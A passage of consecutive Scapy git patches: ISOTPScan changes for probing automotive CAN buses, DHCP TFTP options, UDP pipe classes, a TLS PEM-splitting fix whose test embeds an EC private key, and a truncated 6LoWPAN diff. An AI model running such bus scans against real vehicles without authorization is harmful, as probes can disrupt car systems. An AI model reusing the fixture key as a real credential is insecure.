proto=103, src="10.0.0.14", dst="224.0.0.13")/\ + PIMv2Hdr(version=2, type=3, reserved=0)/\ + PIMv2JoinPrune(up_addr_family=1, up_encoding_type=0, up_neighbor_ip="10.0.0.13", reserved=0, num_group=1, holdtime=210, + jp_ips=[PIMv2GroupAddrs(addr_family=1, encoding_type=0, bidirection=0, reserved=0, admin_scope_zone=0, + mask_len=32, gaddr="239.123.123.123", + join_ips=[PIMv2JoinAddrs(addr_family=1, encoding_type=0, rsrvd=0, sparse=1, wildcard=1, + rpt=1, mask_len=32, src_ip="1.1.1.1")], + prune_ips=[]) + ] + ) + + +assert raw(join_pkt) == b'\x01\x00^\x00\x00\r\xc2\x02=\x80\x00\x01\x08\x00E\xc0\x006\x00\x8b\x00\x00\x01g\xcd\xfb\n\x00\x00\x0e\xe0\x00\x00\r#\x00Z\xe5\x01\x00\n\x00\x00\r\x00\x01\x00\xd2\x01\x00\x00 \xef{{{\x00\x01\x00\x00\x01\x00\x07 \x01\x01\x01\x01' + + + +prune_pkt = Ether(dst="01:00:5e:00:00:0d", src="c2:02:3d:80:00:01")/IP(version=4, ihl=5, tos=0xc0, id=139, ttl=1, proto=103, src="10.0.0.2", dst="224.0.0.13")/\ + PIMv2Hdr(version=2, type=3, reserved=0)/\ + PIMv2JoinPrune(up_addr_family=1, up_encoding_type=0, up_neighbor_ip="10.0.0.1", reserved=0, num_group=1, holdtime=210, + jp_ips=[PIMv2GroupAddrs(addr_family=1, encoding_type=0, bidirection=0, reserved=0, admin_scope_zone=0, + mask_len=32, gaddr="239.123.123.123", + prune_ips=[PIMv2PruneAddrs(addr_family=1, encoding_type=0, rsrvd=0, sparse=0, wildcard=0, rpt=0, + mask_len=32, src_ip="172.16.40.10")]) + ] + ) + +assert raw(prune_pkt) == b'\x01\x00^\x00\x00\r\xc2\x02=\x80\x00\x01\x08\x00E\xc0\x006\x00\x8b\x00\x00\x01g\xce\x07\n\x00\x00\x02\xe0\x00\x00\r#\x00\x8f\xd8\x01\x00\n\x00\x00\x01\x00\x01\x00\xd2\x01\x00\x00 \xef{{{\x00\x00\x00\x01\x01\x00\x00 \xac\x10(\n' + From 10adbb1c743386c4f64b8b461f74d0cb0d9322b4 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Sat, 5 Sep 2020 19:28:35 +0200 Subject: [PATCH 0270/1632] ISOTPScan improvement (#2777) * This PR changes the internal behaviour of the ISOTPScan functions. The captured noise before a scan is executed is now used to suppress probe packets. On some cars these probe packets caused errors. This change ensures that no packets which could interfeer with the cars internal communication are sent during an ISOTP scan. Cleanup of function comments and added type informations * Add unit tests --- scapy/contrib/isotp.py | 236 +++++++++++++++++++------------------ test/contrib/isotp.uts | 45 +++++++ test/contrib/isotpscan.uts | 83 +++++++++++++ 3 files changed, 252 insertions(+), 112 deletions(-) diff --git a/scapy/contrib/isotp.py b/scapy/contrib/isotp.py index 7c6c6713313..d3ac3b36644 100644 --- a/scapy/contrib/isotp.py +++ b/scapy/contrib/isotp.py @@ -21,6 +21,7 @@ import traceback import heapq from threading import Thread, Event, Lock +from typing import Iterable, Optional, Union, List, Tuple, Dict from scapy.packet import Packet from scapy.fields import BitField, FlagsField, StrLenField, \ @@ -1877,19 +1878,19 @@ def recv(self, x=0xffff): # #################### ISOTPSCAN #################################### # ################################################################### def send_multiple_ext(sock, ext_id, packet, number_of_packets): - """ Send multiple packets with extended addresses at once - - Args: - sock: socket for can interface - ext_id: extended id. First id to send. - packet: packet to send - number_of_packets: number of packets send + # type: (SuperSocket, int, Packet, int) -> None + """Send multiple packets with extended addresses at once. This function is used for scanning with extended addresses. It sends multiple packets at once. The number of packets is defined in the number_of_packets variable. - It only iterates the extended ID, NOT the actual ID of the packet. + It only iterates the extended ID, NOT the actual CAN ID of the packet. This method is used in extended scan function. + + :param sock: CAN interface to send packets + :param ext_id: Extended ISOTP-Address + :param packet: Template Packet + :param number_of_packets: number of packets to send in one batch """ end_id = min(ext_id + number_of_packets, 255) for i in range(ext_id, end_id + 1): @@ -1898,11 +1899,13 @@ def send_multiple_ext(sock, ext_id, packet, number_of_packets): def get_isotp_packet(identifier=0x0, extended=False, extended_can_id=False): - """ Craft ISO TP packet - Args: - identifier: identifier of crafted packet - extended: boolean if packet uses extended address - extended_can_id: boolean if CAN should use extended Ids + # type: (int, bool, bool) -> Packet + """Craft ISO-TP packet + + :param identifier: identifier of crafted packet + :param extended: boolean if packet uses extended address + :param extended_can_id: boolean if CAN should use extended Ids + :return: Crafted Packet """ if extended: @@ -1921,17 +1924,16 @@ def get_isotp_packet(identifier=0x0, extended=False, extended_can_id=False): def filter_periodic_packets(packet_dict, verbose=False): - """ Filter for periodic packets + # type: (Dict[int, Tuple[Packet, int]], bool) -> None + """Filter to remove periodic packets from packet_dict - Args: - packet_dict: Dictionary with Send-to-ID as key and a tuple - (received packet, Recv_ID) - verbose: Displays further information - - ISOTP-Filter for periodic packets (same ID, always same timegap) + ISOTP-Filter for periodic packets (same ID, always same time-gaps) Deletes periodic packets in packet_dict + + :param packet_dict: Dictionary, where the filter is applied + :param verbose: Displays further information """ - filter_dict = {} + filter_dict = {} # type: Dict[int, Tuple[List[int], List[Packet]]] for key, value in packet_dict.items(): pkt = value[0] @@ -1957,22 +1959,20 @@ def filter_periodic_packets(packet_dict, verbose=False): del packet_dict[k] -def get_isotp_fc(id_value, id_list, noise_ids, extended, packet, - verbose=False): +def get_isotp_fc(id_value, id_list, noise_ids, extended, packet, verbose=False): # noqa: E501 + # type: (int, Union[List[int], Dict[int, Tuple[Packet, int]]], Optional[Iterable[int]], bool, Packet, bool) -> None # noqa: E501 """Callback for sniff function when packet received - Args: - id_value: packet id of send packet - id_list: list of received IDs - noise_ids: list of packet IDs which will not be considered when - received during scan - extended: boolean if extended scan - packet: received packet - verbose: displays information during scan - - If received packet is a FlowControl - and not in noise_ids - append it to id_list + If received packet is a FlowControl and not in noise_ids append it + to id_list. + + :param id_value: packet id of send packet + :param id_list: list of received IDs + :param noise_ids: list of packet IDs which will not be considered when + received during scan + :param extended: boolean if extended scan + :param packet: received packet + :param verbose: displays information during scan """ if packet.flags and packet.flags != "extended": return @@ -2002,27 +2002,33 @@ def get_isotp_fc(id_value, id_list, noise_ids, extended, packet, (e, repr(packet))) -def scan(sock, scan_range=range(0x800), noise_ids=None, sniff_time=0.1, - extended_can_id=False, verbose=False): +def scan(sock, # type: SuperSocket + scan_range=range(0x800), # type: Iterable[int] + noise_ids=None, # type: Optional[Iterable[int]] + sniff_time=0.1, # type: float + extended_can_id=False, # type: bool + verbose=False # type: bool + ): # type: (...) -> Dict[int, Tuple[Packet, int]] # noqa: E501 """Scan and return dictionary of detections - Args: - sock: socket for can interface - scan_range: hexadecimal range of IDs to scan. - Default is 0x0 - 0x7ff - noise_ids: list of packet IDs which will not be considered when - received during scan - sniff_time: time the scan waits for isotp flow control responses - after sending a first frame - extended_can_id: Send extended can frames - verbose: displays information during scan - ISOTP-Scan - NO extended IDs found_packets = Dictionary with Send-to-ID as key and a tuple (received packet, Recv_ID) + + :param sock: socket for can interface + :param scan_range: hexadecimal range of IDs to scan. Default is 0x0 - 0x7ff + :param noise_ids: list of packet IDs which will not be tested during scan + :param sniff_time: time the scan waits for isotp flow control responses + after sending a first frame + :param extended_can_id: Send extended can frames + :param verbose: displays information during scan + :return: Dictionary with all found packets """ return_values = dict() for value in scan_range: + if noise_ids and value in noise_ids: + continue + sock.sniff(prn=lambda pkt: get_isotp_fc(value, return_values, noise_ids, False, pkt, verbose), @@ -2044,37 +2050,43 @@ def scan(sock, scan_range=range(0x800), noise_ids=None, sniff_time=0.1, return cleaned_ret_val -def scan_extended(sock, scan_range=range(0x800), scan_block_size=32, - extended_scan_range=range(0x100), noise_ids=None, - sniff_time=0.1, extended_can_id=False, verbose=False): +def scan_extended(sock, # type: SuperSocket + scan_range=range(0x800), # type: Iterable[int] + scan_block_size=32, # type: int + extended_scan_range=range(0x100), # type: Iterable[int] + noise_ids=None, # type: Optional[Iterable[int]] # noqa: E501 + sniff_time=0.1, # type: float + extended_can_id=False, # type: bool + verbose=False # type: bool + ): # type: (...) -> Dict[int, Tuple[Packet, int]] # noqa: E501 """Scan with ISOTP extended addresses and return dictionary of detections - Args: - sock: socket for can interface - scan_range: hexadecimal range of IDs to scan. - Default is 0x0 - 0x7ff - scan_block_size: count of packets send at once - extended_scan_range: range to search for extended ISOTP addresses - noise_ids: list of packet IDs which will not be considered when - received during scan - sniff_time: time the scan waits for isotp flow control responses - after sending a first frame - extended_can_id: Send extended can frames - verbose: displays information during scan - If an answer-packet found -> slow scan with single packages with extended ID 0 - 255 found_packets = Dictionary with Send-to-ID as key and a tuple (received packet, Recv_ID) - """ - return_values = dict() + :param sock: socket for can interface + :param scan_range: hexadecimal range of IDs to scan. Default is 0x0 - 0x7ff + :param scan_block_size: count of packets send at once + :param extended_scan_range: range to search for extended ISOTP addresses + :param noise_ids: list of packet IDs which will not be tested during scan + :param sniff_time: time the scan waits for isotp flow control responses + after sending a first frame + :param extended_can_id: Send extended can frames + :param verbose: displays information during scan + :return: Dictionary with all found packets + """ + return_values = dict() # type: Dict[int, Tuple[Packet, int]] scan_block_size = scan_block_size or 1 for value in scan_range: - pkt = get_isotp_packet(value, extended=True, - extended_can_id=extended_can_id) - id_list = [] + if noise_ids and value in noise_ids: + continue + + pkt = get_isotp_packet( + value, extended=True, extended_can_id=extended_can_id) + id_list = [] # type: List[int] r = list(extended_scan_range) for ext_isotp_id in range(r[0], r[-1], scan_block_size): sock.sniff(prn=lambda p: get_isotp_fc(ext_isotp_id, id_list, @@ -2113,26 +2125,8 @@ def ISOTPScan(sock, can_interface=None, extended_can_id=False, verbose=False): - """Scan for ISOTP Sockets on a bus and return findings - Args: - sock: CANSocket object to communicate with the bus under scan - scan_range: hexadecimal range of CAN-Identifiers to scan. - Default is 0x0 - 0x7ff - extended_addressing: scan with ISOTP extended addressing - extended_scan_range: range for ISOTP extended addressing values - noise_listen_time: seconds to listen for default - communication on the bus - sniff_time: time the scan waits for isotp flow control responses - after sending a first frame - output_format: defines the format of the returned - results (text, code or sockets). Provide a string - e.g. "text". Default is "socket". - can_interface: interface used to create the returned code/sockets - extended_can_id: Use Extended CAN-Frames - verbose: displays information during scan - Scan for ISOTP Sockets in the defined range and returns found sockets in a specified format. The format can be: @@ -2140,8 +2134,23 @@ def ISOTPScan(sock, - code: python code for copy&paste - sockets: if output format is not specified, ISOTPSockets will be created and returned in a list - """ + :param sock: CANSocket object to communicate with the bus under scan + :param scan_range: range of CAN-Identifiers to scan. Default is 0x0 - 0x7ff + :param extended_addressing: scan with ISOTP extended addressing + :param extended_scan_range: range for ISOTP extended addressing values + :param noise_listen_time: seconds to listen for default communication on + the bus + :param sniff_time: time the scan waits for isotp flow control responses + after sending a first frame + :param output_format: defines the format of the returned results + (text, code or sockets). Provide a string e.g. + "text". Default is "socket". + :param can_interface: interface used to create the returned code/sockets + :param extended_can_id: Use Extended CAN-Frames + :param verbose: displays information during scan + :return: + """ if verbose: print("Filtering background noise...") @@ -2185,13 +2194,14 @@ def ISOTPScan(sock, def generate_text_output(found_packets, extended_addressing=False): - """Generate a human readable output from the result of the `scan` or - the `scan_extended` function. - - Args: - found_packets: result of the `scan` or `scan_extended` function - extended_addressing: print results from a scan with ISOTP - extended addressing + # type: (Dict[int, Tuple[Packet, int]], bool) -> str + """Generate a human readable output from the result of the `scan` or the + `scan_extended` function. + + :param found_packets: result of the `scan` or `scan_extended` function + :param extended_addressing: print results from a scan with + ISOTP extended addressing + :return: human readable scan results """ if not found_packets: return "No packets found." @@ -2230,15 +2240,16 @@ def generate_text_output(found_packets, extended_addressing=False): def generate_code_output(found_packets, can_interface, extended_addressing=False): + # type: (Dict[int, Tuple[Packet, int]], str, bool) -> str """Generate a copy&past-able output from the result of the `scan` or - the `scan_extended` function. - - Args: - found_packets: result of the `scan` or `scan_extended` function - can_interface: description string for a CAN interface to be - used for the creation of the output. - extended_addressing: print results from a scan with ISOTP - extended addressing + the `scan_extended` function. + + :param found_packets: result of the `scan` or `scan_extended` function + :param can_interface: description string for a CAN interface to be + used for the creation of the output. + :param extended_addressing: print results from a scan with ISOTP + extended addressing + :return: Python-code as string to generate all found sockets """ result = "" if not found_packets: @@ -2274,17 +2285,18 @@ def generate_code_output(found_packets, can_interface, def generate_isotp_list(found_packets, can_interface, extended_addressing=False): + # type: (Dict[int, Tuple[Packet, int]], str, bool) -> List[ISOTPSocket] """Generate a list of ISOTPSocket objects from the result of the `scan` or - the `scan_extended` function. - - Args: - found_packets: result of the `scan` or `scan_extended` function - can_interface: description string for a CAN interface to be - used for the creation of the output. - extended_addressing: print results from a scan with ISOTP - extended addressing + the `scan_extended` function. + + :param found_packets: result of the `scan` or `scan_extended` function + :param can_interface: description string for a CAN interface to be + used for the creation of the output. + :param extended_addressing: print results from a scan with ISOTP + extended addressing + :return: A list of all found ISOTPSockets """ - socket_list = [] + socket_list = [] # type: List[ISOTPSocket] for pack in found_packets: pkt = found_packets[pack][0] diff --git a/test/contrib/isotp.uts b/test/contrib/isotp.uts index f4f6a738b96..4ddd29c8b5a 100644 --- a/test/contrib/isotp.uts +++ b/test/contrib/isotp.uts @@ -185,6 +185,14 @@ assert(p.exsrc == 3) assert(p.data == b"eee") assert(bytes(p) == b"eee") += ISOTP answers test +p = ISOTP() +r = ISOTP() +assert(p.data == b"") +assert(p.answers(r)) +assert(not p.answers(Raw())) + + = Creation of a simple ISOTP packet with src validation error ex = False try: @@ -433,6 +441,21 @@ assert(fragment.length == 5) assert(fragment.reserved == 0) assert(fragment.flags == 4) += Fragment a 8 bytes long ISOTP message extended +fragments = ISOTP(b"datadata", dst=0x1fff0000).fragment() +assert(len(fragments) == 2) +assert(isinstance(fragments[0], CAN)) +fragment = CAN(bytes(fragments[0])) +assert(fragment.data == b"\x10\x08datada") +assert(fragment.length == 8) +assert(fragment.reserved == 0) +assert(fragment.flags == 4) +fragment = CAN(bytes(fragments[1])) +assert(fragment.data == b"\x21ta") +assert(fragment.length == 3) +assert(fragment.reserved == 0) +assert(fragment.flags == 4) + = Fragment a 7 bytes long ISOTP message fragments = ISOTP(b"abcdefg").fragment() assert(len(fragments) == 1) @@ -490,6 +513,12 @@ fragments = [CAN(identifier=0x641, data=b"\xa4test")] isotp = ISOTP.defragment(fragments) assert isotp is None += Defragment ISOTP message with warning +fragments = [CAN(identifier=0x641, data=b"\x04test"), CAN(identifier=0x642, data=b"\x04test")] +isotp = ISOTP.defragment(fragments) +assert(isotp.data == b"test") +assert(isotp.dst == 0x641) + = Defragment exception fragments = [] ex = False @@ -501,6 +530,15 @@ except Scapy_Exception: assert ex += Fragment exception +ex = False +try: + fragments = ISOTP(b"a" * (1 << 32)).fragment() +except Scapy_Exception: + ex = True + +assert ex + = Defragment an ISOTP message composed of multiple CAN frames fragments = [ CAN(identifier=0x641, data=dhex("41 10 10 61 62 63 64 65")), @@ -1276,6 +1314,13 @@ isotp = pkts[0] assert(isotp.data == dhex("")) assert (isotp.dst == 0x241) += ISOTPSession tests + +ses = ISOTPSession() +ses.on_packet_received(None) +ses.on_packet_received([None, None]) +assert True + = Receive a two-frame ISOTP message with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x641, did=0x241) as s: with new_can_socket(iface0) as cans: diff --git a/test/contrib/isotpscan.uts b/test/contrib/isotpscan.uts index d7be7fc06cc..8ec821613a7 100644 --- a/test/contrib/isotpscan.uts +++ b/test/contrib/isotpscan.uts @@ -300,6 +300,44 @@ def test_isotpscan_text(sniff_time=0.02): assert "0x703" in result assert "No Padding" in result +def test_isotpscan_text_padding(sniff_time=0.02): + semaphore = threading.Semaphore(0) + def isotpserver(i): + with new_can_socket0() as isocan, \ + ISOTPSocket(isocan, sid=0x700 + i, did=0x600 + i, padding=True) as isotpsock: + isotpsock.sniff(timeout=1500 * sniff_time, count=1, + started_callback=semaphore.release) + pkt = CAN(identifier=0x701, length=8, + data=b'\x01\x02\x03\x04\x05\x06\x07\x08') + thread_noise = threading.Thread(target=make_noise, args=(pkt, sniff_time,)) + thread_noise.start() + thread1 = threading.Thread(target=isotpserver, args=(2,)) + thread2 = threading.Thread(target=isotpserver, args=(3,)) + thread1.start() + thread2.start() + semaphore.acquire() + semaphore.acquire() + with new_can_socket0() as scansock: + result = ISOTPScan(scansock, range(0x5ff, 0x604 + 1), + output_format="text", + noise_listen_time=sniff_time * 6, + sniff_time=sniff_time, + verbose=True) + with new_can_socket0() as cans: + cans.send(CAN(identifier=0x601, data=b'\x01\xaaffffff')) + cans.send(CAN(identifier=0x602, data=b'\x01\xaaffffff')) + cans.send(CAN(identifier=0x603, data=b'\x01\xaaffffff')) + thread1.join(timeout=10) + thread2.join(timeout=10) + thread_noise.join(timeout=10) + text = "\nFound 2 ISOTP-FlowControl Packet(s):" + assert text in result + assert "0x602" in result + assert "0x603" in result + assert "0x702" in result + assert "0x703" in result + assert "Padding enabled" in result + def test_isotpscan_text_extended_can_id(sniff_time=0.02): semaphore = threading.Semaphore(0) @@ -387,6 +425,43 @@ def test_isotpscan_code(sniff_time=0.02): assert s2 in result +def test_isotpscan_code_noise(sniff_time=0.02): + semaphore = threading.Semaphore(0) + def isotpserver(i): + with new_can_socket0() as isocan, \ + ISOTPSocket(isocan, sid=0x700 + i, did=0x600 + i) as isotpsock: + isotpsock.sniff(timeout=1500 * sniff_time, count=1, + started_callback=semaphore.release) + pkt = CAN(identifier=0x702, length=8, + data=b'\x01\x02\x03\x04\x05\x06\x07\x08') + thread_noise = threading.Thread(target=make_noise, args=(pkt, sniff_time,)) + thread_noise.start() + thread1 = threading.Thread(target=isotpserver, args=(2,)) + thread2 = threading.Thread(target=isotpserver, args=(3,)) + thread1.start() + thread2.start() + semaphore.acquire() + semaphore.acquire() + with new_can_socket0() as scansock: + result = ISOTPScan(scansock, range(0x5ff, 0x603 + 1), + output_format="code", + noise_listen_time=sniff_time * 6, + sniff_time=sniff_time, + can_interface="can0", + verbose=True) + with new_can_socket0() as cans: + cans.send(CAN(identifier=0x601, data=b'\x01\xaa')) + cans.send(CAN(identifier=0x603, data=b'\x01\xaa')) + thread1.join(timeout=10) + thread2.join(timeout=10) + thread_noise.join(timeout=10) + s2 = "ISOTPSocket(can0, sid=0x603, did=0x703, " \ + "padding=False, basecls=ISOTP)\n" + print(result) + assert s2 in result + + + def test_extended_isotpscan_code(sniff_time=0.02): semaphore = threading.Semaphore(0) def isotpserver(i): @@ -758,6 +833,10 @@ test_dynamic(test_scan_extended) test_dynamic(test_isotpscan_text) += Test ISOTPScan with padding (output_format=text) + +test_dynamic(test_isotpscan_text_padding) + = Test ISOTPScan(output_format=text) extended_can_id test_dynamic(test_isotpscan_text_extended_can_id) @@ -766,6 +845,10 @@ test_dynamic(test_isotpscan_text_extended_can_id) test_dynamic(test_isotpscan_code) += Test ISOTPScan with noise (output_format=code) + +test_dynamic(test_isotpscan_code_noise) + = Test extended ISOTPScan(output_format=code) test_dynamic(test_extended_isotpscan_code) From 173ed33d119804ff10c43d009679bb2c6c3eaedc Mon Sep 17 00:00:00 2001 From: Artur Zdolinski Date: Tue, 8 Sep 2020 15:38:21 +0200 Subject: [PATCH 0271/1632] Add TFTP options to DHCP (#2765) * Add TFTP options to DHCP - fix issue 2747 - also update random tests * Update dhcp.py * Update dhcp.py "-" > "_" --- scapy/layers/dhcp.py | 3 +++ test/regression.uts | 2 +- 2 files changed, 4 insertions(+), 1 deletion(-) diff --git a/scapy/layers/dhcp.py b/scapy/layers/dhcp.py index d4afa5290dc..f035b067294 100644 --- a/scapy/layers/dhcp.py +++ b/scapy/layers/dhcp.py @@ -175,6 +175,7 @@ def getfield(self, pkt, s): 62: "nwip-domain-name", 64: "NISplus_domain", 65: IPField("NISplus_server", "0.0.0.0"), + 66: "tftp_server_name", 67: StrField("boot-file-name", ""), 68: IPField("mobile-ip-home-agent", "0.0.0.0"), 69: IPField("SMTP_server", "0.0.0.0"), @@ -210,11 +211,13 @@ def getfield(self, pkt, s): 118: IPField("subnet-selection", "0.0.0.0"), 124: "vendor_class", 125: "vendor_specific_information", + 128: IPField("tftp_server_ip_address", "0.0.0.0"), 136: IPField("pana-agent", "0.0.0.0"), 137: "v4-lost", 138: IPField("capwap-ac-v4", "0.0.0.0"), 141: "sip_ua_service_domains", 146: "rdnss-selection", + 150: IPField("tftp_server_address", "0.0.0.0"), 159: "v4-portparams", 160: StrField("v4-captive-portal", ""), 208: "pxelinux_magic", diff --git a/test/regression.uts b/test/regression.uts index 72b3e0366f7..fdb18f151ac 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -12072,7 +12072,7 @@ assert BOOTP().hashret() == b"\x00\x00\x00\x00" import random random.seed(0x2809) -assert str(RandDHCPOptions(size=1)) in [r"[('NIS_server', '0.45.231.69')]", r"[('ieee802-3-encapsulation', 229)]"] +assert str(RandDHCPOptions(size=1)) in [r"[('NIS_server', '0.45.231.69')]", r"[('tcp_ttl', 229)]"] = DHCPOptionsField From ba25d0a9735f7521fe2bb6f9d3912032b5f9d757 Mon Sep 17 00:00:00 2001 From: Xavier Mehrenberger Date: Thu, 10 Sep 2020 10:43:59 +0200 Subject: [PATCH 0272/1632] Add UDPClientPipe and UDPServerPipe to scapypipes (#2473) --- scapy/scapypipes.py | 88 +++++++++++++++++++++++++++++++++++++++++++++ test/pipetool.uts | 23 ++++++++++++ 2 files changed, 111 insertions(+) diff --git a/scapy/scapypipes.py b/scapy/scapypipes.py index 166970c1fc7..5e69ca5f629 100644 --- a/scapy/scapypipes.py +++ b/scapy/scapypipes.py @@ -410,6 +410,94 @@ def deliver(self): break +class UDPClientPipe(TCPConnectPipe): + """UDP send packets to addr:port and use it as source and sink + Start trying to receive only once a packet has been send + + .. code:: + + +-------------+ + >>-| |->> + | | + >-|-[addr:port]-|-> + +-------------+ + """ + + def __init__(self, addr="", port=0, name=None): + TCPConnectPipe.__init__(self, addr, port, name) + self._has_sent = False + + def start(self): + self.fd = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + self.fd.connect((self.addr, self.port)) + + def push(self, msg): + self.fd.sendto(msg, (self.addr, self.port)) + self._has_sent = True + + def deliver(self): + if not self._has_sent: + return + try: + msg = self.fd.recv(65536) + except socket.error: + self.stop() + raise + if msg: + self._send(msg) + + +class UDPServerPipe(TCPListenPipe): + """UDP bind to [addr:]port and use as source and sink + Use (ip, port) from first received IP packet as destination for all data + + .. code:: + + +------^------+ + >>-| +-[peer]-|->> + | / | + >-|-[addr:port]-|-> + +-------------+ + """ + + def __init__(self, addr="", port=0, name=None): + TCPListenPipe.__init__(self, addr, port, name) + self._destination = None + + def start(self): + self.fd = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + self.fd.bind((self.addr, self.port)) + + def push(self, msg): + if self._destination: + self.fd.sendto(msg, self._destination) + else: + self.q.put(msg) + + def deliver(self): + if self._destination: + try: + msg = self.fd.recv(65536) + except socket.error: + self.stop() + raise + if msg: + self._send(msg) + else: + msg, dest = self.fd.recvfrom(65536) + if msg: + self._send(msg) + self._destination = dest + self._trigger(dest) + self._high_send(dest) + while True: + try: + msg = self.q.get(block=False) + self.fd.sendto(msg, self._destination) + except Empty: + break + + class TriggeredMessage(Drain): """Send a preloaded message when triggered and trigger in chain diff --git a/test/pipetool.uts b/test/pipetool.uts index e1c8af3fec6..930bfa79fb6 100644 --- a/test/pipetool.uts +++ b/test/pipetool.uts @@ -677,6 +677,29 @@ s.push("data") s.deliver() assert c.q.get(timeout=1) == "hello" += UDPClientPipe and UDPServerPipe +~ networking needs_root + +p = PipeEngine() + +s = CLIFeeder() +srv = UDPServerPipe(name="srv", port=10000) +cli = UDPClientPipe(name="cli", addr="127.0.0.1", port=10000) +c = QueueSink(name="c") + +s > cli +srv > c + +p.add(s, c) +p.start() +import time +time.sleep(1) + +s.send(b"hello") +p.start() +assert c.recv() == b"hello" +p.stop() + = TCPConnectPipe networking test ~ networking needs_root From d8dbf3807afcd4c4b138a18e1d3afb0db151058b Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Thu, 10 Sep 2020 15:24:25 +0000 Subject: [PATCH 0273/1632] Fix TLS split_pem --- scapy/layers/tls/cert.py | 5 +++++ test/cert.uts | 16 ++++++++++++++++ 2 files changed, 21 insertions(+) diff --git a/scapy/layers/tls/cert.py b/scapy/layers/tls/cert.py index 8f5d80401f8..b6eb0af2bd6 100644 --- a/scapy/layers/tls/cert.py +++ b/scapy/layers/tls/cert.py @@ -102,7 +102,12 @@ def split_pem(s): if start_idx == -1: break end_idx = s.find(b"-----END") + if end_idx == -1: + raise Exception("Invalid PEM object (missing END tag)") end_idx = s.find(b"\n", end_idx) + 1 + if end_idx == 0: + # There is no final \n + end_idx = len(s) pem_strings.append(s[start_idx:end_idx]) s = s[end_idx:] return pem_strings diff --git a/test/cert.uts b/test/cert.uts index 12eadfae69f..bdc8b5008ab 100644 --- a/test/cert.uts +++ b/test/cert.uts @@ -384,6 +384,22 @@ with ContextManagerCaptureOutput() as cmco: y.show() assert cmco.get_output().strip() == awaited.strip() += Cert: Check split_pem on chained certs with missing end \n +from scapy.layers.tls.cert import split_pem +ks = split_pem(b""" +-----BEGIN EC PRIVATE KEY----- +MHQCAQEEIMiRlFoy6046m1NXu911ukXyjDLVgmOXWCKWdQMd8gCRoAcGBSuBBAAK +oUQDQgAE55WjbZjS/88K1kYagsO9wtKifw0IKLp4Jd5qtmDF2Zu+xrwrBRT0HBnP +weDU+RsFxcyU/QxD9WYORzYarqxbcA== +-----END EC PRIVATE KEY----- +-----BEGIN EC PRIVATE KEY----- +MHQCAQEEIMiRlFoy6046m1NXu911ukXyjDLVgmOXWCKWdQMd8gCRoAcGBSuBBAAK +oUQDQgAE55WjbZjS/88K1kYagsO9wtKifw0IKLp4Jd5qtmDF2Zu+xrwrBRT0HBnP +weDU+RsFxcyU/QxD9WYORzYarqxbcA== +-----END EC PRIVATE KEY-----""") +assert ks[0][:-1] == ks[1] + + ########### CRL class ############################################### + CRL class tests From d0d89c31da50f787ec36d880070cf24682897f8b Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Fri, 11 Sep 2020 22:27:46 +0000 Subject: [PATCH 0274/1632] Force close the UDP server --- scapy/scapypipes.py | 8 ++++---- test/pipetool.uts | 3 +-- 2 files changed, 5 insertions(+), 6 deletions(-) diff --git a/scapy/scapypipes.py b/scapy/scapypipes.py index 5e69ca5f629..1cbd43cbde0 100644 --- a/scapy/scapypipes.py +++ b/scapy/scapypipes.py @@ -425,18 +425,18 @@ class UDPClientPipe(TCPConnectPipe): def __init__(self, addr="", port=0, name=None): TCPConnectPipe.__init__(self, addr, port, name) - self._has_sent = False + self.connected = False def start(self): self.fd = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) self.fd.connect((self.addr, self.port)) + self.connected = True def push(self, msg): - self.fd.sendto(msg, (self.addr, self.port)) - self._has_sent = True + self.fd.send(msg) def deliver(self): - if not self._has_sent: + if not self.connected: return try: msg = self.fd.recv(65536) diff --git a/test/pipetool.uts b/test/pipetool.uts index 930bfa79fb6..8ccbb5cf1bb 100644 --- a/test/pipetool.uts +++ b/test/pipetool.uts @@ -692,13 +692,12 @@ srv > c p.add(s, c) p.start() -import time -time.sleep(1) s.send(b"hello") p.start() assert c.recv() == b"hello" p.stop() +srv.stop() = TCPConnectPipe networking test ~ networking needs_root From f28c11096c6f641ff5b6f98d9f810ee4909efc0d Mon Sep 17 00:00:00 2001 From: Gabriel Date: Sun, 13 Sep 2020 10:15:27 +0200 Subject: [PATCH 0275/1632] 6LoWPAN cleanup (#2751) * Major rework of SixLoWPAN * Tiny travis fix * guedou suggestion --- .travis.yml | 4 +- scapy/fields.py | 20 + scapy/layers/sixlowpan.py | 960 ++++++++++++++++++++++++++------------ test/dot15d4.uts | 92 +++- 4 files changed, 767 insertions(+), 309 deletions(-) diff --git a/.travis.yml b/.travis.yml index 570a7001a36..dd12c00a93c 100644 --- a/.travis.yml +++ b/.travis.yml @@ -64,9 +64,9 @@ jobs: - os: linux python: 3.8 env: - - SCAPY_PY_OPTS="-Werror -X tracemalloc=25" TOXENV=py38-linux_root + - SCAPY_PY_OPTS="-Werror -X tracemalloc" TOXENV=py38-linux_root allow_failures: - - env: SCAPY_PY_OPTS="-Werror -X tracemalloc=25" TOXENV=py38-linux_root + - env: SCAPY_PY_OPTS="-Werror -X tracemalloc" TOXENV=py38-linux_root install: - bash .config/ci/install.sh diff --git a/scapy/fields.py b/scapy/fields.py index b51635760f0..0b4c1e5276c 100644 --- a/scapy/fields.py +++ b/scapy/fields.py @@ -92,6 +92,8 @@ class Field(six.with_metaclass(Field_metaclass, object)): holds_packets = 0 def __init__(self, name, default, fmt="H"): + if not isinstance(name, str): + raise ValueError("name should be a string") self.name = name if fmt[0] in "@=<>!": self.fmt = fmt @@ -1259,6 +1261,8 @@ def getfield(self, pkt, s): if self.next_cls_cb is not None: cls = self.next_cls_cb(pkt, [], None, s) c = 1 + if cls is None: + c = 0 lst = [] ret = b"" @@ -1720,6 +1724,22 @@ def i2len(self, pkt, x): return float(self.size) / 8 +class BitFixedLenField(BitField): + __slots__ = ["length_from"] + + def __init__(self, name, default, length_from): + self.length_from = length_from + super(BitFixedLenField, self).__init__(name, default, 0) + + def getfield(self, pkt, s): + self.size = self.length_from(pkt) + return super(BitFixedLenField, self).getfield(pkt, s) + + def addfield(self, pkt, s, val): + self.size = self.length_from(pkt) + return super(BitFixedLenField, self).addfield(pkt, s, val) + + class BitFieldLenField(BitField): __slots__ = ["length_of", "count_of", "adjust"] diff --git a/scapy/layers/sixlowpan.py b/scapy/layers/sixlowpan.py index a3d24b3b7a2..87caa944690 100644 --- 